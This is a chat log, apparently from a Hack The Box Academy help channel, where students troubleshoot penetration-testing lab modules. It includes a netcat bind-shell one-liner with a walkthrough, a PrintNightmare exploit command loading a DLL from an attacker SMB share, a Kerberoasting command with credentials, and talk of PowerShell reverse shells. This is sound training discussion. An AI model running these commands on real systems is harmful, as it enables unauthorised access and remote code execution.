There is only linux and darwin in that releases folder... hmmm. I think I built it.
Ahhh... click on show all 85 assets
gotcha! thanks
Hi, someone did the Introduction to Malware Analysis - Debugging section recently, it seems like its not working properly
like this guy apparently
that was 2 months ago btw
in order for people to help you it helps others to know what you've done/tried/errors
just saying "It's not working :(" isn't helpful
Maybe a skill issue, i did all the x64dbg steps in order to bypass the Sandbox detection but it keeps detecting it at run.
I tried like 10 times
I saved the "modified" executable, still the same
ok i must ask. is it really worth the money for this site? i only ask because i was in the middle of a lesson and lost connection to VM and i can no longer complete the course due to the 1 a day ordeal.
<@&861185840277487616>
It is best to run your own vm. The course content (especially when you can sub as a student for 8$ a month) is really good
If you are running on a non sub then your time with the pwnbox is limited, but you’ll learn much more running your own vm anyway
so i run parrot on dual boot. how do i do the class without loading into the pwnbox that has been my issue
you can just connect via the vpn pack
You have to “connect via vpn”, download the academy vpn file and run “sudo openvpn <yourfile>”
can i not run ssh
in order to ssh into the target you need to be connected to the vpn
or if you want to ssh to the pwnbox, you need to well... launch the pwnbox
ok i understand what is being said. where do i find this vpn download
but the htb targets are mostly on a separated internal network
if the module has a target spawn, above where it shows "spawn instance"
there will be a dropdown list you can select the vpn server from and protocol, then just click download
Hi Chat, why cant i send a message in general chat?
sudo openvpn /downloads/academy-regular.ovpn
i am guessing this was wrong.
read and follow #welcome
/downloads/ doesn't exist
there is no downloads folder in the root of your filesystem
there is one in your Home (~)
Downloads (capitalization matters)
here's a big tip for linux, if it's not popping up when you hit tab it likely isn't there
Thank you Boss
i am currently that module for dir
for instance if you open a terminal and do sudo openvpn Downloads/academy-regular.ovpn or sudo openvpn ~/Downloads/academy-regular.ovpn it should run
and once you see Initialization sequence complete (and maybe a few lines after) you're good to go open a new terminal and work off that
ok so if i understand correctly once initialization is complete the new terminal will correlate to the study modal
no
the vpn is good for the whole of academy modules, you don't need to download a new one every time
it just facilitates a connection to the HTB private internal servers where the targets are launched
allowing you to connect to the targets on the 10.129.x.x network
ok so then i ssh to target?
if that's what the module asks you to do, yes
perfect i was able to gain access to target. so let me ask you this. with every download vpn will it give me a target ip if so where do i find it
it won't give you the target ip
by the questions there's "Target: 'Click here to spawn target system'"
that's what spawns and gives you the target, as stated, you don't need to redownload the vpn every time
ok so every lesson just run sudo openvpn and then open new terminal and just go about the course
thank you for the help
nope you just need to run it once per session that you're working on academy
ok
you can go to another section, spawn a target, and you'll be able to connect to it
note: when you start a target it will end other targets running for your account, so you can't spawn 5 targets for a module
ok i think i have an understanding. thank you very much for assisting me.
the vpn you download isn't tied to the section you're working on, it's tied to your academy account as a whole, basically
All you need to know about the VPN Connection for Academy
that makes it clear. as long as vpn is running terminal is connected HTB
your system is; yes
Hey did you figure out what's needed?
don't remember exactly what I did, but i just did whatever they said to do in the module notes, previously i was trying my own custom loaders
I literally did exactly that
Did you have an actual listener on at the time?
all right. i got the answer on my own by writing a super janky pwntools script and using the lists in the seclists directory; i didn't even know what they were referring to when they mentioned the "provided" wordlist.
can someone just tell/DM me what were supposed to be the intended ways to solve the second enumeration question, with the actual working commands? i'm guessing it was intended to be done with either of the network mapper script or the standalone CLI tool. but i can't for the life of me figure out what the syntax is to get the user to pop out of the results for either method.
i would love to know both ways and would appreciate if anyone would be kind enough to just let me know.. i spent days on this determined to get the flag on my own without looking up the support messages here and was able to prevail 🙏
there's a "resources" link on the page that contains wordlists applicable to the various modules. just put the module and section names in your text, no one's going to bother typing the url in from your pic.
right. i already see what they meant now.
anyway, module Footprinting, page SMTP
if it's a better prompt to work with for feedback, i can provide some command history. (just want to reiterate, have already got the flag; just can't figure out what my syntaxing problems are here):
Smtp is slow, you may want to __w__ait a bit
Also that module has a provided wordlist or two in the resources button
thank you for the hint 👌
Did you make sure to pick the right project type? .net vs .net framework?
Actually I'm not sure. Thanks I'll check that out
I did aes only do I have to have both xor and aes?
quick question if my subscription ended can i still run the machines in the modules i finished or only i can read them
i mean cpts path modules
if you completed the module you can start the targets still
even if my subscription expired ?
yes, if you completed the module before the subscription expired
this is cool W HTB
Wait until you find out you'll still have access to unlimited pwnbox
this is insane hahaha BIG W
I need help with this question Windows PE + 0 Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag. i cannot update the slack cookie
anyone got a nudge for the final question of Windows Lateral Movement? I got the vnc password, stuck on getting dc connection
please i need help
Hello!
Error after executing a kernel exploit CVE-2021-3493
When I try to implement the steps explained in the solution (https://academy.hackthebox.com/module/51/section/467) I have an error.
When I try to execute a compiled binary on the target machine, I receive an error which says that the glibc.so.6 is not the right version. Does someone have the same issue and how he/she fixed it?
Another issue is that if I have "root access" (output of the id command shows that I am root), I cannot read any root-related content. (have you seen this behavior?)
Thanks!
Currently I'm in double pivot in exploitation of cpts path, i did double pivot but in nmap results it is showing port state as a filtered anyone please help me
If you’re using Proxy chains you might wanna do -sT
I used the method shown in the module
Even i tried ligolo but i'm unable to ping the final machine
Yeah, but it wouldn't take the right answer until I reloaded the page.
For the last question in Windows Lateral movement.. did anybody experience unbelievable slowness connecting to VNC? I am using proxychains, because when I used ligolo for pivot it didn't even seem to connect. Not sure how to get a better/faster connection
The window doesn't even seem to respond to mouse clicks
Hello
Who is now studying in Windows PE , if you there let’s review together?
can any one help me with active directory attack and enum module bleeding edge vulnerabilities PrintNightmare portion i am getting this error when running the command "sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'"
Help me please :Modern Web Exploitation Techniques
skills assesment : What is the flag value at the /flag endpoint of the PDF web application?
I tried dnsrebinding technique but not worked
Hello everyone I am new can anyone please tell me a good source to study bug bounty from 0 ?
Follow the fundamentals path and CBBH path on Academy
Please help
I tried this and https://lock.cmpxchg8b.com/rebinder.html but not worked
Try 'smtp://<IP>'
Maybe it will work
Have you tried just "fiona"?
i got 500 points what module do u recommend i heard good stuff about the bloodhound and the crackmapexec module i'm planning to get the cpts will they help me ?
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
yeah found that one
but when connecting to FTP with that credentials now work for me
like when we do "ls" it just say "Passive mode" and no response.
Have you tried turning passive mode off?
how to do it
Type passive, if I remember right
this one kindly
You can DM
Hello guys i'm new here i'm doing the password attacks module and im at the section network services i'm doing the smb one but i get an empty flag.txt does anyone have the same issue?
screenshot?
What module/section is that?
Attacking Common Services - Easy
write command here
Network services
which section?
i got you, where are you stuck?
yeah, i had got same issue when i was doing this.
OK thanks
Hey who can help me with how to connect to vpn on laptop using hackthebox im new to this
Did you Google the error?
They said use ssl= Disabled but when i use it terminal said invalid option
--skip-ssl
Anybody who can give me a hint for ADCS skill assessment, i tried to get a shell on DEV01 with printnightmare as I found $RPC, i tried to request a cert for DEV01, but it needs higher privilege than tom to actually issue the cert, i tried to capture hashes, but there seems no activity... what technique/skill should i restudy ?
Y'all know how to get my acc back?
Contact support
Nahh bro said i can't get my acc back
Hi i am currently in the learning process model , I tried finding some resources about the ROQ relationship oriented question model to understand it better but I failed finding such, as any search result either video or google does not give ROQ like if it only exists in htb, I hardly understand how to apply ROQ in everyday life without further examples than the one used on htb which talks about the methods we can use to access windows remotely, please help
can some one please help me over this
can someone please give me a nudge on the last question of windows lateral movement SA? I got the VNC password but cannot connect to domain controller
You don’t use vnc to connect to the dc
The command you passed is missing a slash '\ IP' '\ \IP'
/ or //
smbclient works with // otherwise you need to \\\\
I just finished it, check if you pivot correctly.
Can anyone tell me when we have to use backslash & forward slash while using smbclient and how much time we have to use?
I always confused about this
\ is an escape character in bash; and most languages \\\\ <-- this is 4 " \ " but will be interpreted as 2;
// has been accepted by smbclient for a while now and can replace the \\\\
but the UNC path needs to have 2 [interpreted] slashes to be a valid path
\\\\[IP/SERVER]\\Sharename is the same as //[IP/SERVER]/Sharename
if the share has any spaces in it you'll need to wrap it in quotes
ive connected to the backup computer through rdp, found open ports on dc, etc. Ive been on this for too long lol
hi, can i ask questions about non retired machines anywhere here? Or is that not allowed? Upon logging in, the forum for machines is is invite only:) Just joined the server, and i didnt find where to ask
read and follow #welcome to access more of the server; they're not "invite only" you just need to follow basic instructions
Yeah, just saw it now. Thanks
also you can't really discuss active machines without spoiling
you can ask for nudges
true, but i have tried to get foothold for like 2 days, and i dont know if i am in a rabbithole or not. So i just need a yes or no answer lol
where would i ask for nudges?
if it's one of the two recent releases they have their own channel [ #1317551396920229958 #1320087957612265574 ] or #boxes
Okay I did a double pivot. If you want you can DM.
it is about the caption machine
sent u one
then #boxes...
getting started module, types of shells. do i need to understand the shell commands for ex:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
because it's not explained so that's y im asking
throw it into explainshell
- if /tmp/f exists delete it
- create a fifo named pipe /tmp/f
- read the pipe; and send it to bash (include error and stdout redirect, 2>&1) pipe that to netcat
- use netcat to listen [-l] on port x [-p x]
- then redirect the netcat output to the named pipe (/tmp/f)
/bin/bash -i runs bash in "interactive"
@lime cosmos moving the convo here; what section are you working on in Getting Started
Hi is there an implementation for reseting a module progression ?
no
Ok thanks !
google, man pages, and --help are gonna be your best friend, |,; are command separators so you can individually figure out each command
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
giving the module and section name is more helpful
you're given bob's login on the page
i send the link
if it's meant to be bruteforced or sprayed it won't take a long time
ok and i will use the rockyou list ?
that's the general rule of thumb ~hour at most
you'll use whatever list seems appropriate
the modules teach you how to craft your own list and things of that nature
ok thanks
don't overthink the getting started module
it's not gonna have you do anything overly complex
Appreciate it gonna keep this in mind
at least you're willing to try and understand instead of "oh ok this is a bind shell command, whatever"
that is what im trying to avoid as much as possible i want to understand the roots of everything to build strong foundation
it also helps to understand when digging is gonna lead you down a rabbithole. but reasonably understanding what a tool does allows you to understand similar tools.
I approach any section by reading it first, then thinking about it deeply and searching to understand anything that doesn't make sense. And at the end, I write notes down
Write as you go, highlight words you don't understand [in an app like obsidian that's easy with ==text== or (word/phrase)?] That way when you encounter it again or it's explained later you can hopefully clear confusion
Ok this is useful I didn’t know about it
I’ll use for sure
This is note taking 101 :)
Rewriting in your own words is almost always more beneficial
The only person that needs to understand your notes is yourself
Yea i write 90% of the notes by myself
Exactly i always try to explain as im explaining to sm1 with 0 knowledge about cybersecurity
need a nugget from cme skillassesment last question (DC01)
With what do you stuck at?
last question in general got to the ccache and got the flag but after that im stuck
using || nick ||
Try to investigate that 'Ccache' share further. perhaps the share's name can serve as some hint.
it does 🙂
ty i guess my nxc is broken again didnt got anything
time for smbclient
The question is doable with crackmapexec/netexec alone.
i bet if it works properly
Did you end up finding a solution for this? I’m currently bruteforcing the offset but I feel like that can’t be it lol
I’m stuck on abusing HTTP misconfigurations skill assessment - hard. I’m not sure where to start. Any chance someone could help me figure it out? I’d really appreciate any help.
i'm running a openvpn,but i get a "permission denied",can some one help me to fix this for me please?
sudo openvpn ...
when i trying to SSH to the machine by using htb-student@ip
and i got a permission denied every time even if i enter HTB_@cademy_stdnt!
screenshot
can't send one since they're not verified
aw damm, @carmine hill dm me ; )
Copy/paste the pw [ctrl-shift-v in terminal]
And I'm assuming you're replacing ip with the target 10.129 address
On the CME module skills assessment, the DNS server is not accepting queries...
That DC needs rebooting...
Even the solutions to the questions don't work!
Hello , in broken authentication, brute-forcing passwords
The second question, I tried everything, even I tried the entire RockYou.txt without using grep (14344391 passwords)
And nothing worked with me, in the module they used rockyou.txt and they got the password but I think the password doesn’t exist in the rockyou.txt, Any tips?
I am surprised you got that far with the second question... mode 1300 and rockyou will definitely get the user pw.
Oh... different module! Sorry... broken auth!
who are you
<@&861185840277487616>
Yes, go troll elsewhere...
Get better opsec Omar, don't link your personal Spotify to your discord account
I'm doing the Using Web Proxies Skill Assessment and I'm running Intruder to find the correct cookie. They all come back with 200 OK Code and Half of them allow you to login. What am I suppose to put as the Answer?
200 ok doesn’t necessarily mean it did anything successful, can you actually log in with half of them?
The ones with shorter length bring me to a log in screen with a Flag but the flag isnt the correct code.
Does the flag end on ninja?
Yes
i********Ninja with a bunch of characters
That’s the right flag, it starts with HTB and ends on }. Make sure you don’t accidentally copied any spaces
hey
DACL Attacks I > Targeted Kerberoasting
when i try run this command
python3 targetedKerberoast.py -vv -d inlanefreight.local -u pedro -p SecuringAD01 --request-user Moly --dc-ip 10.129.205.81
[] Starting kerberoast attacks
[] Attacking user (Moly)
[DEBUG] {'Moly': {'dn': 'CN=Moly,CN=Users,DC=INLANEFREIGHT,DC=LOCAL', 'spns': []}}
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Traceback (most recent call last):
File "/home/kali/Desktop/cpts/dacl1/targetedKerberoast/targetedKerberoast.py", line 597, in main
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=userName, password=args.auth_password, domain=args.auth_domain, lmhash=None, nthash=auth_nt_hash,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/krb5/kerberosv5.py", line 323, in getKerberosTGT
tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/krb5/kerberosv5.py", line 93, in sendReceive
raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
i did what they said on the note
sudo ntpdate 10.129.205.81
but it's still not working
I let my frustration get the best of me. Lol. Thanks. I appreciate it! 
yup
Hi guys, Im on the Sqlmap module and struggling to understand some of the "attack tuning" part of the module...could someone help me understand it a bit better? Im struggling to understand the prefixes and suffixes part
Do you understand the basics of a query? Like a legit query on the backend? Cause it helps to know that before fine tuning with the suffix and prefix.
what exactly aren't u understanding
yea Im pretty sure I do but I think htb didnt explain this part the best they could
let me show u
basically, the idea of suffix/prefix is that you use them to for the injection itself, it is the thing that triggers the injection
spoilers
is that a spoiler? sorry
So basically with the prefix you're attempting to end the first part of the query in a certain way. So maybe a small string and a certain special character (after you've done some fuzzing) that will terminate the original query. The suffix is what will be at the end of the query, so essentially comment syntax to make sure the rest of the original query, after your injection, is not included
could u pls expand 😅 I thought wit sqlmap it already came with built in payloads that trigger the injection
for example, -- - is used to comment things out, you use it to bypass login for example, what comes after that, is the sqlmap shenanigans that exfiltrate database or read files or whatsoever
Exactly.. lets you define what to "wrap" your injection payloads that sqlmap generates in
ahh I see, that seems to make it a bit clearer
Sometimes sqlmap needs a little hand 😉
ohh I see, I thought Sqlmap would have those in their payloads by default? seems kinda extra to specify this in sqlmap, did the author not think of this in their payloads?
it is useful in whitebox when u can know what triggers the injection, and u just need to see how far can u go with it
Queries are unique - their structure sometimes requires very specific enclosures
Every query language (MSSQL vs MySQL) is different and if it's not working sometimes adding your own syntax helps
ahh ok
cool, thank u, it seems to make it clearer
sqlmap does its best, but yeah, sometimes it can't infer or guess everything correctly
yeah most of the time, but sometimes you have devs doing some of the most weird queries that need some fine tuning, hence the name of the section
ahh I see
I need to get flag 5 and thinking of what to use 🤔
damn i didnt even see 😂
cpts
?
nah cbbh
good luck!
thanks 😄
Guys I'm in login brute forcing skill assessment 2, I found the other port with the webpage but there's no ftp port open or filtered and also ssh blocks me because I don't have the public key.
I tried to see if the public key is in the previous room but I'm having problems connecting to it as it responds to pings but I can't even see the login page
Can't enumerate anything with Medusa or hydra
Your error is due to clock syncing
Kerberos doesn't like unsynchronized clocks
You can sync your time to the DC with "sudo ntpdate [ip address]"
Don't just flat out ask for how to get a flag.. asking for guidance, fine, discussing problems you're having, fine.. avoid posting information directly pertaining to the content.
Just asking how to get the flag, come on
sorry 😅
let me try word that better
Right..
Read back through the section
You have tried a command, it didn't succeed. Read the section for options that can be used to help you
I can't help further, sorry - I'm gonna go chill for a while before bed, but yeah.. just dumping commands and output for questions which didn't work, asking for the answer.. it's the same thing
alr cool, thank you anyways
Hi, when trying to use sqlmap to enumerate tables from a database, why doesn't it sometimes work even if there are tables in the database?
which part are you doing in the sqlmap module?
im doing attack tuning in sqlmaps
which question
see the error , is there any '>' error in the scan process?
Come on
sorry
Third time
Ok
thanks
I'm in login brute force assessment part 2 question 1
I'm reading on the forum that people are able to directly interact with ssh but it's telling me that I'm missing the public key. I nmapped the ip and found other 3 ports open and 2 filtered. It seems to me like all ports don't respond besides the one without service. Any clue?
Hi guys, i'm in the footprinting lab (hard) I have an error when I try to log in with mysql -u tom -p
Error 2002 (HY000): Can't connect to local server through socket '/run/mysqld/mysqld.sock' (2)
You can interact with your pwnbox directly over ssh, not the target for this module.
You do not need to nmap the target
When I use Medusa it says no supported authentication method, when I try to login with ssh user@ip, it tells me immediately that I don't have the public key and I can't interact with ssh again
I don't understand what you mean by "not the target for this module"
module 57, section 516?
Pentester path, module login brute forcing, skills assessment part 2, question 1
one thing to keep in mind, that module was recently updated so the forums you're reading may be wrong
Sure.. read the question carefully
Ok
I still don't get it, I can't brute force anything because I can't interact with anything
What is the name of the ftp user you find via brute forcing?
Can't brute force anything
read the entire page not just the question
My bad about ssh, it is used here. Was looking at another module.
I'm too tired, and done. Night, cya later
But yeah.. the page does tell you what you need to know
Don't post dumps of info like that on modules over Tier 0 fml
Yes I did find the user. The problem is that I can't interact with ssh. I know the user but I get public key error
Ok no I go, for real. Can't deal
Which message is too much?
The one that was deleted
Mmm aight
Not you
g0blin kinda told you exactly what to do
@cloud urchin i told him I didn't understand
And also he was talking with the other guy who asked a question and got it deleted so I don't really know what messages are for me or the other guy
yeah go ahead and dm me
i didn't get it, i used the same command given in the section in module
i did the correction but i'm still facing the same error
Hi. I am new to this and working through Linux Fundamentals in academy. I am stuck on the question asking what is the path to htb-student's home directory and path to mail. I thought I had it but it keeps telling me I am wrong. Can anyone help please??
Can I dm someone about MSSQL, Exchange, and SCCM Attacks Skills Assessment?
Are you asking if it’s normal to complete the last two flags in one go?
check env
Sure
i didn't say/ask to dm
there's a list of common useful commands, one is to list things about the environment (env)
just ask your question
how do i fix this lol
how to rank up ?
just do the machines, and link your profile
this has nothing to do with academy; but i'd assume hitting terminate should fix...something; also you can try hitting up support but it'll be barebones support considering the holidays
to push the rank in HTB should i need to complete challenges or machines ?
In the Linux File Transfer module it says "Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.". Am I expected to write a Python script that does this? This was never touched on in this or previous modules in the Penetration Tester Job Path.
I think they just want you to start a python Webserver with that one liner they taught you
ah it's weird wording, i think def worth an #1234357888114364508 post
because you're just meant to download /flag.txt from http://[spawned_ip]/
if i had silv/gold annual i'd check the guide and see if there's something not-so-obvious
i mean python does have a web requests thing you can import and use
but meh
my bad. But terminating doesn't terminate it 😦
.
reach out to support, this channel isn't for help related to things outside of htb academy
¯_(ツ)_/¯
It is what it is man.
You tried your best to help me, but the rules stopped you somewhere. Godspeed
It's moreso not flooding the chat with unrelated things
This is AD - Bleeding Edge Vulns section. I have the local internal network access via port forwarding (tried both ssh -D and now Chisel). However, I can't get to ping the internal network at 172.16.5.5 nor run nmap on it via proxychains. Any workarounds?
Advanced SQL Injections module.
Is the password for any web app user provided?
How could I test /find-user functionality as it is behind auth.
https://academy.hackthebox.com/module/188/section/1997
Does it mean I need to create a user record in DB
AD Enum
I have entries in proxychains.conf too, with socks 4 on 9050 localhost.
use 127.0.0.1 instead of localhost
i use ligolo for my proxying needs though
Thanks for replying. Are you referring to the part that says "Web Upload" with the self-signed certificate? Because if you are then it is my understanding that this only works after you've exploited the server, so this won't work here. I'm not sure what other Python one-liner you might be referring to.
i suggest using -sn with nmap through a pivot;
or using common windows ports; 445,3389,5985,5986
also make sure you use the correct subnet
but ligolo works much better and the bonus is no need to mess with proxychains
Thanks for responding. I could turn to ChatGPT or something to conjure up a Python one-liner and do this, but that won't be a very teachable moment. Is there anything in the module that shows how to do this?
Try nxc smb <IP>
They specifically asked us to use Python though which is why I'm just making sure
and any files within that webroot directory on the host are considered in the webroot
i'd ignore that
env
Thank you for your input I appreciate it
wrong answer..
oh
you're given a list of potentially useful commands
i mean i don't think env was one of them
it was
it was yea, mb
i was trying something different, in the previous page it was discussing the filesystem where it was mentioned how /var has the mail files, and so i was like locate mail | grep /var
why isn't listing contents of mail getting me htb-student, no one has tried contacting him?
deleting because spoiler
I just got on this website today for the first time. I am curious what's going on? I am 99% sure im getting the answer right but its giving me an error
but an environment variable can be set without it being a valid file location
refresh the page
or you're wrong
cache issue then
also it seems your issue was related to #starting-point not an academy module
My bad. I sent them here
Anyone done the knowledge check at the end of Module 77
Login Brute Forcing - Basic HTTP Authentication
File path changed, please refer to
404 not found
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt
moved
https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/2023-200_most_used_passwords.txt
What is the problem you are facing
Trying to start
what do you mean?
Trying to find a foothold
Did you download the moved location?
let me spawn and see
Thank you
Yes, the route written in the previous module was 404 error, so I checked the seclist commit log.
Do you know what is CMS? If not just look what is running the website
CMS is stuff like wordpress, wix, joomla
I know it's an Apache/Linux based server with HTTP
find what CMS is on the website
GetSimple
yes google or searchsploit that
module name >>> module #
Getting Started sounds worse than Module 77 😁
well it helps others help you in a more useful way
Only real ones know module #s
module # means absolutely fuck all to me
Ah
the only reason i know that it's Getting Started is because people consistently link the endpoint /module/x/section/y
But he knew what module im on 🙂
they likely just did academy.hackthebox.com/module/77
also the module search feature doesn't search module by # it searches keywords/title
I need help with windows prv esc skill assessment part 1, stuck on getting reverse shell
you don't need a revshell to do this
case sensitivity is quite the bitch though from what i recall
Have you tried all command separators
Why? Can i try the OS commands itself ?
yep
Wow, it is easier than i think, Thanks
Thanks, i am gonna try it
Wouldn’t revshell be easier?
i don't recall if i did a revshell for this tbh
Os commands straightforward
but the hint specifies taking advantage of something
oh wait duh you can get a shell via a certain method

i forgor about that nightmare
I know but need more changes
I did use the powershell base64 from revshells, it worked.
I do not know i will try what u said
Yeah that’s what I did
:)
I see it has SSH capabilities
Look for exploits
How would i find the CMS version it's running?
Is there a way to query it from the direct server or would i have to find it
by looking around
Think which ones would help you get the flag to eliminate most
